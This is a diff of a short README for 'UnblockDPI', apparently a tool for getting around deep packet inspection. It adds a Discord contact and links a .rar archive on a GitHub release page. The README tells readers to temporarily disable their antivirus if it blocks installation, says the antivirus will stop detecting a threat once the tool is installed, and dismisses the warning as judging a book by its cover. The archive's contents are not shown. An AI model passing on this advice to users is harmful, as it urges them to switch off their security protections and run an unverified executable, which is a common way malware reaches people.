POLYESTERDPI/UnblockDPI/README.md

 If your antivirus blocks the installation, you may need to temporarily disable it.
 Once installed, the antivirus will not delete anything since then it won't detect a threat.
 Think of it as judging a book by its cover.

+If you have any questions or need help setting it up:
+discord: 1z11

 Download links:

 https://github.com/Novulon/UnblockDPI/releases/download/UnblockDPI-1.0/UnBlockDPI.1.0.rar